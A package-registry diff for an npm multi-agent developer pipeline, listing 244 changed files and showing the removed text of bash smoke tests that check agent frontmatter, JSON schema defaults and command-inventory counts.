@mmerterden/multi-agent-pipeline 12.7.0 → 12.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (244) hide show
  1. package/CHANGELOG.md +126 -0
  2. package/install/_common.mjs +48 -0
  3. package/install/_dev-only-files.mjs +125 -5
  4. package/install/claude.mjs +14 -8
  5. package/install/copilot.mjs +5 -8
  6. package/package.json +17 -2
  7. package/pipeline/commands/multi-agent/analysis/SKILL.md +1 -1
  8. package/pipeline/lib/credential-store.sh +20 -0
  9. package/pipeline/multi-agent-refs/_account-picker.md +1 -1
  10. package/pipeline/multi-agent-refs/_dev-context.md +1 -1
  11. package/pipeline/multi-agent-refs/_repo-picker.md +1 -1
  12. package/pipeline/multi-agent-refs/phases/operations.md +28 -0
  13. package/pipeline/multi-agent-refs/phases/phase-0-init.md +1 -0
  14. package/pipeline/multi-agent-refs/phases/phase-2-planning.md +1 -1
  15. package/pipeline/multi-agent-refs/phases/phase-3-dev.md +1 -2
  16. package/pipeline/multi-agent-refs/phases/phase-4-review.md +49 -4
  17. package/pipeline/schemas/prefs.schema.json +6 -0
  18. package/pipeline/scripts/_smoke-root.sh +61 -0
  19. package/pipeline/scripts/audit-log.sh +25 -0
  20. package/pipeline/scripts/smoke-cross-cli-behavior.sh +21 -7
  21. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-1-analysis.json +0 -25
  22. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-2-plan.json +0 -30
  23. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-4-review.json +0 -20
  24. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/expected/phase-4-triage.json +0 -15
  25. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/metadata.json +0 -14
  26. package/pipeline/eval/golden-tasks/01-ios-bugfix-darkmode/task.json +0 -12
  27. package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-1-analysis.json +0 -29
  28. package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-2-plan.json +0 -43
  29. package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-4-review.json +0 -35
  30. package/pipeline/eval/golden-tasks/02-android-feature-compose/expected/phase-4-triage.json +0 -35
  31. package/pipeline/eval/golden-tasks/02-android-feature-compose/metadata.json +0 -14
  32. package/pipeline/eval/golden-tasks/02-android-feature-compose/task.json +0 -12
  33. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-1-analysis.json +0 -29
  34. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-2-plan.json +0 -42
  35. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-4-review.json +0 -20
  36. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/expected/phase-4-triage.json +0 -15
  37. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/metadata.json +0 -14
  38. package/pipeline/eval/golden-tasks/03-backend-python-ratelimit/task.json +0 -12
  39. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-1-analysis.json +0 -29
  40. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-2-plan.json +0 -40
  41. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-4-review.json +0 -20
  42. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/expected/phase-4-triage.json +0 -15
  43. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/metadata.json +0 -14
  44. package/pipeline/eval/golden-tasks/04-frontend-next-hydration/task.json +0 -12
  45. package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-1-analysis.json +0 -29
  46. package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-2-plan.json +0 -42
  47. package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-4-review.json +0 -28
  48. package/pipeline/eval/golden-tasks/05-ios-security-keychain/expected/phase-4-triage.json +0 -27
  49. package/pipeline/eval/golden-tasks/05-ios-security-keychain/metadata.json +0 -14
  50. package/pipeline/eval/golden-tasks/05-ios-security-keychain/task.json +0 -12
  51. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-1-analysis.json +0 -29
  52. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-2-plan.json +0 -41
  53. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-4-review.json +0 -12
  54. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/expected/phase-4-triage.json +0 -6
  55. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/metadata.json +0 -14
  56. package/pipeline/eval/golden-tasks/06-android-refactor-usecase/task.json +0 -12
  57. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-1-analysis.json +0 -29
  58. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-2-plan.json +0 -42
  59. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-4-review.json +0 -28
  60. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/expected/phase-4-triage.json +0 -27
  61. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/metadata.json +0 -14
  62. package/pipeline/eval/golden-tasks/07-backend-node-idempotency/task.json +0 -12
  63. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-1-analysis.json +0 -25
  64. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-2-plan.json +0 -31
  65. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-4-review.json +0 -12
  66. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/expected/phase-4-triage.json +0 -18
  67. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/metadata.json +0 -14
  68. package/pipeline/eval/golden-tasks/08-ios-auth-consensus-unverified/task.json +0 -12
  69. package/pipeline/eval/golden-tasks/README.md +0 -65
  70. package/pipeline/eval/intent-cases.json +0 -40
  71. package/pipeline/eval/run-metrics-fixture.json +0 -93
  72. package/pipeline/eval/triage/01-empty-findings/expected.json +0 -6
  73. package/pipeline/eval/triage/01-empty-findings/input.json +0 -5
  74. package/pipeline/eval/triage/01-empty-findings/notes.md +0 -7
  75. package/pipeline/eval/triage/02-real-blocker/expected.json +0 -15
  76. package/pipeline/eval/triage/02-real-blocker/input.json +0 -14
  77. package/pipeline/eval/triage/02-real-blocker/notes.md +0 -7
  78. package/pipeline/eval/triage/03-out-of-scope-defer/expected.json +0 -18
  79. package/pipeline/eval/triage/03-out-of-scope-defer/input.json +0 -14
  80. package/pipeline/eval/triage/03-out-of-scope-defer/notes.md +0 -10
  81. package/pipeline/eval/triage/04-false-positive-reject/expected.json +0 -18
  82. package/pipeline/eval/triage/04-false-positive-reject/input.json +0 -14
  83. package/pipeline/eval/triage/04-false-positive-reject/notes.md +0 -10
  84. package/pipeline/eval/triage/05-mixed-classification/expected.json +0 -43
  85. package/pipeline/eval/triage/05-mixed-classification/input.json +0 -38
  86. package/pipeline/eval/triage/05-mixed-classification/notes.md +0 -17
  87. package/pipeline/eval/triage/06-severity-mismatch/expected.json +0 -15
  88. package/pipeline/eval/triage/06-severity-mismatch/input.json +0 -14
  89. package/pipeline/eval/triage/06-severity-mismatch/notes.md +0 -9
  90. package/pipeline/eval/triage/07-duplicate-reviewers/expected.json +0 -27
  91. package/pipeline/eval/triage/07-duplicate-reviewers/input.json +0 -22
  92. package/pipeline/eval/triage/07-duplicate-reviewers/notes.md +0 -9
  93. package/pipeline/eval/triage/08-style-misclassified/expected.json +0 -18
  94. package/pipeline/eval/triage/08-style-misclassified/input.json +0 -14
  95. package/pipeline/eval/triage/08-style-misclassified/notes.md +0 -9
  96. package/pipeline/eval/triage/09-cascading-finding/expected.json +0 -23
  97. package/pipeline/eval/triage/09-cascading-finding/input.json +0 -22
  98. package/pipeline/eval/triage/09-cascading-finding/notes.md +0 -9
  99. package/pipeline/eval/triage/10-deferred-crossref/expected.json +0 -18
  100. package/pipeline/eval/triage/10-deferred-crossref/input.json +0 -14
  101. package/pipeline/eval/triage/10-deferred-crossref/notes.md +0 -9
  102. package/pipeline/eval/triage/11-vercel-token-leak-blocker/expected.json +0 -27
  103. package/pipeline/eval/triage/11-vercel-token-leak-blocker/input.json +0 -22
  104. package/pipeline/eval/triage/11-vercel-token-leak-blocker/notes.md +0 -14
  105. package/pipeline/eval/triage/README.md +0 -54
  106. package/pipeline/scripts/benchmark-phase-0.sh +0 -128
  107. package/pipeline/scripts/check-md-links.mjs +0 -88
  108. package/pipeline/scripts/eval-golden-tasks-live.mjs +0 -302
  109. package/pipeline/scripts/eval-golden-tasks.mjs +0 -224
  110. package/pipeline/scripts/eval-intent.mjs +0 -107
  111. package/pipeline/scripts/eval-mine-corpus.mjs +0 -211
  112. package/pipeline/scripts/eval-triage.mjs +0 -171
  113. package/pipeline/scripts/fixtures/diff-risk-android.diff +0 -40
  114. package/pipeline/scripts/fixtures/diff-risk-ios.diff +0 -48
  115. package/pipeline/scripts/fixtures/diff-risk-test-removal.diff +0 -40
  116. package/pipeline/scripts/fixtures/install-layout.tsv +0 -19
  117. package/pipeline/scripts/fixtures/pack-expected-count.txt +0 -1
  118. package/pipeline/scripts/fixtures/test-gap-node.diff +0 -30
  119. package/pipeline/scripts/fixtures/test-gap-python.diff +0 -32
  120. package/pipeline/scripts/lint-mcp-refs.mjs +0 -218
  121. package/pipeline/scripts/lint-skills.mjs +0 -154
  122. package/pipeline/scripts/run-smokes.mjs +0 -130
  123. package/pipeline/scripts/scorecard.mjs +0 -258
  124. package/pipeline/scripts/smoke-add-detail.sh +0 -137
  125. package/pipeline/scripts/smoke-agent-guard.sh +0 -74
  126. package/pipeline/scripts/smoke-agent-log-cost.sh +0 -262
  127. package/pipeline/scripts/smoke-agent-model-routing.sh +0 -87
  128. package/pipeline/scripts/smoke-ask-choice.sh +0 -42
  129. package/pipeline/scripts/smoke-autopilot-circuit-breaker.sh +0 -36
  130. package/pipeline/scripts/smoke-bitbucket-contract.sh +0 -255
  131. package/pipeline/scripts/smoke-changelog-version.sh +0 -47
  132. package/pipeline/scripts/smoke-channels-approval-gate.sh +0 -60
  133. package/pipeline/scripts/smoke-channels-flow.sh +0 -130
  134. package/pipeline/scripts/smoke-ci-workflows.sh +0 -88
  135. package/pipeline/scripts/smoke-clarify.sh +0 -148
  136. package/pipeline/scripts/smoke-command-inventory.sh +0 -81
  137. package/pipeline/scripts/smoke-commands-skills-parity.sh +0 -87
  138. package/pipeline/scripts/smoke-community-gates.sh +0 -75
  139. package/pipeline/scripts/smoke-compliance-skills.sh +0 -119
  140. package/pipeline/scripts/smoke-config-hygiene.sh +0 -58
  141. package/pipeline/scripts/smoke-context-budget.sh +0 -72
  142. package/pipeline/scripts/smoke-cost-budget.sh +0 -70
  143. package/pipeline/scripts/smoke-cost-summary.sh +0 -139
  144. package/pipeline/scripts/smoke-cross-phase-cohesion.sh +0 -128
  145. package/pipeline/scripts/smoke-description-tr.sh +0 -82
  146. package/pipeline/scripts/smoke-dev-critic.sh +0 -144
  147. package/pipeline/scripts/smoke-diff-explain.sh +0 -147
  148. package/pipeline/scripts/smoke-diff-risk.sh +0 -190
  149. package/pipeline/scripts/smoke-dynamic-skill-loading.sh +0 -160
  150. package/pipeline/scripts/smoke-eval-live.sh +0 -136
  151. package/pipeline/scripts/smoke-evidence-gate.sh +0 -93
  152. package/pipeline/scripts/smoke-extract-conventions.sh +0 -163
  153. package/pipeline/scripts/smoke-fetchers-offline.sh +0 -448
  154. package/pipeline/scripts/smoke-figma-dispatch.sh +0 -112
  155. package/pipeline/scripts/smoke-gate-hooks.sh +0 -74
  156. package/pipeline/scripts/smoke-gc-tmp.sh +0 -130
  157. package/pipeline/scripts/smoke-gc-worktrees.sh +0 -125
  158. package/pipeline/scripts/smoke-generate-issue.sh +0 -120
  159. package/pipeline/scripts/smoke-handoff-contract.sh +0 -92
  160. package/pipeline/scripts/smoke-identity-isolation.sh +0 -70
  161. package/pipeline/scripts/smoke-install-layout.sh +0 -248
  162. package/pipeline/scripts/smoke-intent-guard.sh +0 -86
  163. package/pipeline/scripts/smoke-issue-comment-template.sh +0 -86
  164. package/pipeline/scripts/smoke-issue-jira-triad.sh +0 -120
  165. package/pipeline/scripts/smoke-keychain.sh +0 -158
  166. package/pipeline/scripts/smoke-language-axis.sh +0 -109
  167. package/pipeline/scripts/smoke-learning-curve.sh +0 -61
  168. package/pipeline/scripts/smoke-learnings-ledger.sh +0 -86
  169. package/pipeline/scripts/smoke-lib-scripts.sh +0 -448
  170. package/pipeline/scripts/smoke-mcp-gate.sh +0 -68
  171. package/pipeline/scripts/smoke-md-links.sh +0 -8
  172. package/pipeline/scripts/smoke-md2confluence.sh +0 -126
  173. package/pipeline/scripts/smoke-metrics-cache-ratio.sh +0 -72
  174. package/pipeline/scripts/smoke-migrate-state.sh +0 -102
  175. package/pipeline/scripts/smoke-mode-dispatch-drift.sh +0 -161
  176. package/pipeline/scripts/smoke-model-fallback.sh +0 -89
  177. package/pipeline/scripts/smoke-multi-repo-integration.sh +0 -116
  178. package/pipeline/scripts/smoke-multi-repo-worktree.sh +0 -61
  179. package/pipeline/scripts/smoke-no-mcp-in-dev-phases.sh +0 -194
  180. package/pipeline/scripts/smoke-no-token-prompt.sh +0 -85
  181. package/pipeline/scripts/smoke-own-punctuation.sh +0 -103
  182. package/pipeline/scripts/smoke-pack-contents.sh +0 -140
  183. package/pipeline/scripts/smoke-pat-audit.sh +0 -128
  184. package/pipeline/scripts/smoke-per-repo-memory.sh +0 -156
  185. package/pipeline/scripts/smoke-phase-0-multi-repo.sh +0 -170
  186. package/pipeline/scripts/smoke-phase-6-multi.sh +0 -79
  187. package/pipeline/scripts/smoke-phase-banner.sh +0 -101
  188. package/pipeline/scripts/smoke-phase-tracker.sh +0 -324
  189. package/pipeline/scripts/smoke-phase0-bridge-contract.sh +0 -241
  190. package/pipeline/scripts/smoke-phase4-gates.sh +0 -45
  191. package/pipeline/scripts/smoke-phase4-triage.sh +0 -229
  192. package/pipeline/scripts/smoke-plan-approval-gate.sh +0 -71
  193. package/pipeline/scripts/smoke-plan-safety.sh +0 -139
  194. package/pipeline/scripts/smoke-plan-todos.sh +0 -196
  195. package/pipeline/scripts/smoke-pr-review-actions.sh +0 -152
  196. package/pipeline/scripts/smoke-pre-commit.sh +0 -170
  197. package/pipeline/scripts/smoke-pref-migration.sh +0 -226
  198. package/pipeline/scripts/smoke-prefs-language.sh +0 -134
  199. package/pipeline/scripts/smoke-progress-contract.sh +0 -127
  200. package/pipeline/scripts/smoke-prune-logs.sh +0 -137
  201. package/pipeline/scripts/smoke-purge.sh +0 -138
  202. package/pipeline/scripts/smoke-push-retry.sh +0 -75
  203. package/pipeline/scripts/smoke-repo-map.sh +0 -300
  204. package/pipeline/scripts/smoke-review-readiness.sh +0 -92
  205. package/pipeline/scripts/smoke-review-watch.sh +0 -146
  206. package/pipeline/scripts/smoke-routines.sh +0 -84
  207. package/pipeline/scripts/smoke-run-aggregator.sh +0 -216
  208. package/pipeline/scripts/smoke-run-metrics.sh +0 -50
  209. package/pipeline/scripts/smoke-search.sh +0 -187
  210. package/pipeline/scripts/smoke-shadow-git.sh +0 -224
  211. package/pipeline/scripts/smoke-skill-authoring.sh +0 -137
  212. package/pipeline/scripts/smoke-skill-language.sh +0 -83
  213. package/pipeline/scripts/smoke-skill-manifest.sh +0 -138
  214. package/pipeline/scripts/smoke-skill-scan.sh +0 -198
  215. package/pipeline/scripts/smoke-source-parity.sh +0 -85
  216. package/pipeline/scripts/smoke-subagent-validators.sh +0 -108
  217. package/pipeline/scripts/smoke-sync-parity.sh +0 -92
  218. package/pipeline/scripts/smoke-tasklist-ordering.sh +0 -112
  219. package/pipeline/scripts/smoke-telemetry.sh +0 -147
  220. package/pipeline/scripts/smoke-test-gap.sh +0 -183
  221. package/pipeline/scripts/smoke-token-budget.sh +0 -67
  222. package/pipeline/scripts/smoke-token-preflight.sh +0 -82
  223. package/pipeline/scripts/smoke-tracker-contract.sh +0 -191
  224. package/pipeline/scripts/smoke-tracker-tokens-invocation.sh +0 -73
  225. package/pipeline/scripts/smoke-triage-memory.sh +0 -174
  226. package/pipeline/scripts/smoke-update-check.sh +0 -135
  227. package/pipeline/scripts/smoke-url-enrichment.sh +0 -70
  228. package/pipeline/scripts/smoke-validate-analysis-doc.sh +0 -161
  229. package/pipeline/scripts/smoke-validator-contradiction.sh +0 -67
  230. package/pipeline/scripts/smoke-validator-gates.sh +0 -164
  231. package/pipeline/scripts/smoke-vercel-deploy-redact.sh +0 -129
  232. package/pipeline/scripts/smoke-verify-by-test.sh +0 -148
  233. package/pipeline/scripts/smoke-wiki-integration.sh +0 -122
  234. package/pipeline/scripts/smoke-work-summary.sh +0 -163
  235. package/pipeline/scripts/smoke-workflow-audit.sh +0 -101
  236. package/pipeline/scripts/smoke-worktree-path-convention.sh +0 -86
  237. package/pipeline/scripts/smoke-wrapper-preservation.sh +0 -68
  238. package/pipeline/scripts/smoke-write-state.sh +0 -159
  239. package/pipeline/scripts/sync-parity-check.sh +0 -135
  240. package/pipeline/scripts/test-gap-rules/android.json +0 -25
  241. package/pipeline/scripts/test-gap-rules/ios.json +0 -34
  242. package/pipeline/scripts/test-gap-rules/node.json +0 -29
  243. package/pipeline/scripts/test-gap-rules/python.json +0 -25
  244. package/pipeline/scripts/validate-schemas.mjs +0 -88
@@ -1,148 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-clarify.sh
3
- #
4
- # Verifies the Phase 0 Step 8 clarifying-question loop:
5
- # 1. pipeline/agents/task-clarifier.md exists with required frontmatter
6
- # 2. Agent default model is haiku (cost-driven choice)
7
- # 3. clarify-output schema is valid JSON
8
- # 4. Schema enforces clarityScore range (0-10)
9
- # 5. Schema enforces options minItems 2 / maxItems 4
10
- # 6. Schema declares stopAndAsk + questions + userAnswers
11
- # 7. prefs schema exposes clarifyAmbiguous.{enabled, model, minScoreToProceed, maxQuestions, autopilotMode}
12
- # 8. clarifyAmbiguous.enabled defaults to false (opt-in)
13
- # 9. autopilotMode default is "log" (preserve autopilot signal without blocking)
14
- # 10. minScoreToProceed default is 6 (borderline-clear threshold)
15
- # 11. phase-0-init.md documents Step 8 (Clarification)
16
- # 12. phase-0-init.md cites task-clarifier.md
17
- # 13. phase-0-init.md documents all 3 autopilot modes (skip/log/abort)
18
- #
19
- # Exit 0 = all pass, 1 = any failure.
20
-
21
- set -uo pipefail
22
-
23
- ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
24
- AGENT="$ROOT/pipeline/agents/task-clarifier.md"
25
- SCHEMA="$ROOT/pipeline/schemas/clarify-output.schema.json"
26
- PREFS_SCHEMA="$ROOT/pipeline/schemas/prefs.schema.json"
27
- PHASE_DOC="$ROOT/pipeline/multi-agent-refs/phases/phase-0-init.md"
28
-
29
- pass=0
30
- fail=0
31
- failures=()
32
- record_pass() { pass=$((pass + 1)); printf ' \033[0;32mPASS\033[0m %s\n' "$1"; }
33
- record_fail() { fail=$((fail + 1)); failures+=("$1"); printf ' \033[0;31mFAIL\033[0m %s\n' "$1"; }
34
-
35
- printf '→ smoke-clarify: Phase 0 Step 8 clarifying-question loop contract\n'
36
-
37
- # 1-2. Agent file + frontmatter + model
38
- if [ ! -f "$AGENT" ]; then
39
- record_fail "pipeline/agents/task-clarifier.md missing"
40
- else
41
- fm=$(awk '/^---$/{n++; if(n==2) exit; if(n==1) next} n==1{print}' "$AGENT")
42
- for key in description model preferredModel; do
43
- if grep -qE "^${key}:" <<<"$fm"; then
44
- record_pass "agent frontmatter has '${key}'"
45
- else
46
- record_fail "agent frontmatter missing '${key}'"
47
- fi
48
- done
49
- if grep -qE "^model: haiku" <<<"$fm"; then
50
- record_pass "agent default model is haiku (cost-driven choice)"
51
- else
52
- record_fail "agent model default should be haiku"
53
- fi
54
- fi
55
-
56
- # 3-6. Output schema shape
57
- if [ ! -f "$SCHEMA" ]; then
58
- record_fail "clarify-output.schema.json missing"
59
- elif ! jq empty "$SCHEMA" 2>/dev/null; then
60
- record_fail "clarify-output.schema.json is not valid JSON"
61
- else
62
- record_pass "clarify-output.schema.json parses"
63
- if jq -e '.properties.clarityScore | (.minimum == 0 and .maximum == 10)' "$SCHEMA" >/dev/null 2>&1; then
64
- record_pass "schema enforces clarityScore range 0-10"
65
- else
66
- record_fail "schema clarityScore range incorrect"
67
- fi
68
- if jq -e '.properties.questions.items.properties.options | (.minItems == 2 and .maxItems == 4)' "$SCHEMA" >/dev/null 2>&1; then
69
- record_pass "schema enforces options minItems 2 / maxItems 4"
70
- else
71
- record_fail "schema options bounds missing"
72
- fi
73
- for prop in stopAndAsk questions userAnswers; do
74
- if jq -e ".properties.${prop}" "$SCHEMA" >/dev/null 2>&1; then
75
- record_pass "schema exposes '${prop}'"
76
- else
77
- record_fail "schema missing '${prop}'"
78
- fi
79
- done
80
- fi
81
-
82
- # 7. Prefs schema toggle exposure
83
- for prop in enabled model minScoreToProceed maxQuestions autopilotMode; do
84
- if jq -e ".properties.global.properties.clarifyAmbiguous.properties.${prop}" "$PREFS_SCHEMA" >/dev/null 2>&1; then
85
- record_pass "prefs schema exposes clarifyAmbiguous.${prop}"
86
- else
87
- record_fail "prefs schema missing clarifyAmbiguous.${prop}"
88
- fi
89
- done
90
-
91
- # 8. Off by default
92
- if jq -e '.properties.global.properties.clarifyAmbiguous.properties.enabled
93
- | has("default") and .default == false' "$PREFS_SCHEMA" >/dev/null 2>&1; then
94
- record_pass "clarifyAmbiguous.enabled defaults to false (opt-in)"
95
- else
96
- record_fail "clarifyAmbiguous.enabled should default to false"
97
- fi
98
-
99
- # 9. autopilotMode default = "log"
100
- ap_default=$(jq -r '.properties.global.properties.clarifyAmbiguous.properties.autopilotMode.default // empty' "$PREFS_SCHEMA")
101
- if [ "$ap_default" = "log" ]; then
102
- record_pass "autopilotMode defaults to log"
103
- else
104
- record_fail "autopilotMode default should be 'log' (got: ${ap_default:-missing})"
105
- fi
106
-
107
- # 10. minScoreToProceed default = 6
108
- ms_default=$(jq -r '.properties.global.properties.clarifyAmbiguous.properties.minScoreToProceed.default // empty' "$PREFS_SCHEMA")
109
- if [ "$ms_default" = "6" ]; then
110
- record_pass "minScoreToProceed defaults to 6"
111
- else
112
- record_fail "minScoreToProceed default should be 6 (got: ${ms_default:-missing})"
113
- fi
114
-
115
- # 11. Phase doc documents Step 8
116
- if [ ! -f "$PHASE_DOC" ]; then
117
- record_fail "phase-0-init.md missing"
118
- else
119
- if grep -qE 'Step 8 - Clarification' "$PHASE_DOC"; then
120
- record_pass "phase-0-init.md documents Step 8 - Clarification"
121
- else
122
- record_fail "phase-0-init.md missing Step 8 - Clarification section"
123
- fi
124
- # 12. cites task-clarifier
125
- if grep -qF "task-clarifier.md" "$PHASE_DOC"; then
126
- record_pass "phase doc cites agents/task-clarifier.md"
127
- else
128
- record_fail "phase doc must reference agents/task-clarifier.md"
129
- fi
130
- # 13. all 3 autopilot modes named in the doc
131
- has_skip=0; has_log=0; has_abort=0
132
- grep -q "\`skip\`" "$PHASE_DOC" && has_skip=1
133
- grep -q "\`log\`" "$PHASE_DOC" && has_log=1
134
- grep -q "\`abort\`" "$PHASE_DOC" && has_abort=1
135
- if [ "$has_skip" = "1" ] && [ "$has_log" = "1" ] && [ "$has_abort" = "1" ]; then
136
- record_pass "phase doc documents all 3 autopilot modes (skip/log/abort)"
137
- else
138
- record_fail "phase doc missing one of skip/log/abort autopilot modes"
139
- fi
140
- fi
141
-
142
- printf '\n══ clarify smoke: %d passed, %d failed ══\n' "$pass" "$fail"
143
- if [ "$fail" -gt 0 ]; then
144
- printf '\nFailures:\n'
145
- for msg in "${failures[@]}"; do printf ' - %s\n' "$msg"; done
146
- exit 1
147
- fi
148
- exit 0
@@ -1,81 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-command-inventory.sh - the command inventory is DERIVED, never asserted.
3
- #
4
- # Every count that describes "how many multi-agent commands exist" used to be a
5
- # literal in prose (contract header, sync skill, dispatcher). Adding a command
6
- # left those literals stale while every gate stayed green, because the gates
7
- # asserted the literal instead of the tree. This gate computes the count from
8
- # pipeline/commands/multi-agent/*/ and requires the prose to agree.
9
- #
10
- # Verifies:
11
- # 1. contract header count == number of command directories
12
- # 2. every command directory appears in the contract inventory block
13
- # 3. both sync surfaces (command + Copilot skill) carry the same count twice
14
- # ("N commands are synced" + "instructions + N sub-command skills")
15
- # 4. every command directory appears in both sync inventory blocks
16
- # 5. every command directory has its shared/core skill counterpart
17
- #
18
- # Exit: 0 all green, 1 any failure.
19
-
20
- set -euo pipefail
21
-
22
- HERE="$(cd "$(dirname "$0")" && pwd)"
23
- ROOT="$(cd "$HERE/../.." && pwd)"
24
- CMD_DIR="$ROOT/pipeline/commands/multi-agent"
25
- CONTRACT="$ROOT/pipeline/multi-agent-refs/cross-cli-contract.md"
26
- SYNC="$ROOT/pipeline/commands/multi-agent/sync/SKILL.md"
27
- SYNC_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-sync/SKILL.md"
28
- SKILLS_DIR="$ROOT/pipeline/skills/shared/core"
29
-
30
- PASS=0
31
- FAIL=0
32
- pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
33
- fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
34
-
35
- echo "══ smoke-command-inventory ══"
36
-
37
- for f in "$CONTRACT" "$SYNC" "$SYNC_SKILL"; do
38
- [ -f "$f" ] || { echo " ✗ missing file: ${f#$ROOT/}"; exit 1; }
39
- done
40
-
41
- COMMANDS=$(find "$CMD_DIR" -mindepth 1 -maxdepth 1 -type d -exec basename {} \; | sort)
42
- N=$(printf '%s\n' "$COMMANDS" | grep -c . || true)
43
-
44
- echo "→ 1. derived count from the command tree: $N commands"
45
- [ "$N" -gt 0 ] && pass "found $N command directories" || fail "no command directories under ${CMD_DIR#$ROOT/}"
46
-
47
- echo "→ 2. contract header agrees"
48
- if grep -Fq "## 1. Command Inventory ($N commands)" "$CONTRACT"; then
49
- pass "contract header = $N"
50
- else
51
- fail "contract header does not say ($N commands): $(grep -o '## 1\. Command Inventory ([0-9]* commands)' "$CONTRACT" || echo 'header not found')"
52
- fi
53
-
54
- echo "→ 3. sync surfaces agree (2 counts x 2 files)"
55
- for f in "$SYNC" "$SYNC_SKILL"; do
56
- rel="${f#$ROOT/}"
57
- grep -Fq "**$N commands are synced**" "$f" && pass "$rel: synced count = $N" || fail "$rel: 'N commands are synced' != $N"
58
- grep -Fq "instructions + $N sub-command skills" "$f" && pass "$rel: step-2 count = $N" || fail "$rel: 'instructions + N sub-command skills' != $N"
59
- done
60
-
61
- echo "→ 4. every command is listed in the contract + both sync inventories"
62
- MISSING_LIST=0
63
- while IFS= read -r cmd; do
64
- [ -n "$cmd" ] || continue
65
- for f in "$CONTRACT" "$SYNC" "$SYNC_SKILL"; do
66
- grep -Eq "(^|[ ,])$cmd([ ,]|$)" "$f" || { fail "${f#$ROOT/}: inventory missing '$cmd'"; MISSING_LIST=1; }
67
- done
68
- done <<< "$COMMANDS"
69
- [ "$MISSING_LIST" -eq 0 ] && pass "all $N commands listed on all 3 surfaces"
70
-
71
- echo "→ 5. shared/core skill counterpart exists for every command"
72
- MISSING_SKILL=0
73
- while IFS= read -r cmd; do
74
- [ -n "$cmd" ] || continue
75
- [ -f "$SKILLS_DIR/multi-agent-$cmd/SKILL.md" ] || { fail "no shared/core skill for '$cmd'"; MISSING_SKILL=1; }
76
- done <<< "$COMMANDS"
77
- [ "$MISSING_SKILL" -eq 0 ] && pass "all $N commands have a shared/core skill"
78
-
79
- echo ""
80
- echo "══ command-inventory smoke: $PASS passed, $FAIL failed ══"
81
- [ "$FAIL" -eq 0 ] || exit 1
@@ -1,87 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-commands-skills-parity.sh - catch drift between the dual source of
3
- # truth for pipeline sub-commands.
4
- #
5
- # Current state: pipeline/commands/multi-agent/{cmd}.md (Claude slash
6
- # commands) and pipeline/skills/shared/multi-agent-{cmd}/SKILL.md (Copilot
7
- # skills) describe the same behaviors in parallel. ROADMAP 4.0 will collapse
8
- # them to a single source. Until then, any command that exists in one but
9
- # not the other is a bug - users will see feature mismatch between CLIs.
10
- #
11
- # This smoke enforces structural parity (every command has a matching skill).
12
- # Content drift is a separate problem - sync-parity-check.sh is the manual
13
- # watchdog for that.
14
-
15
- set -uo pipefail
16
-
17
- REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
18
- CMDS_DIR="$REPO_ROOT/pipeline/commands/multi-agent"
19
- SKILLS_DIR="$REPO_ROOT/pipeline/skills/shared/core"
20
-
21
- if [ ! -d "$CMDS_DIR" ]; then
22
- echo "FAIL: $CMDS_DIR missing" >&2
23
- exit 1
24
- fi
25
- if [ ! -d "$SKILLS_DIR" ]; then
26
- echo "FAIL: $SKILLS_DIR missing" >&2
27
- exit 1
28
- fi
29
-
30
- PASS=0
31
- FAIL=0
32
- pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
33
- fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
34
-
35
- # Commands to check - top-level *.md files under commands/multi-agent/.
36
- # Underscore-prefixed files (e.g. _account-picker.md) are internal fragments
37
- # loaded by other commands via Read; they're not invocable slash commands and
38
- # intentionally have no matching skill.
39
- CMDS=$(find "$CMDS_DIR" -mindepth 2 -maxdepth 2 -name "SKILL.md" -exec sh -c 'for f do basename "$(dirname "$f")"; done' sh {} + | sort)
40
-
41
- # help.md in commands maps to multi-agent-help skill; the main "multi-agent"
42
- # skill covers the behavior documented across multiple command files, so we
43
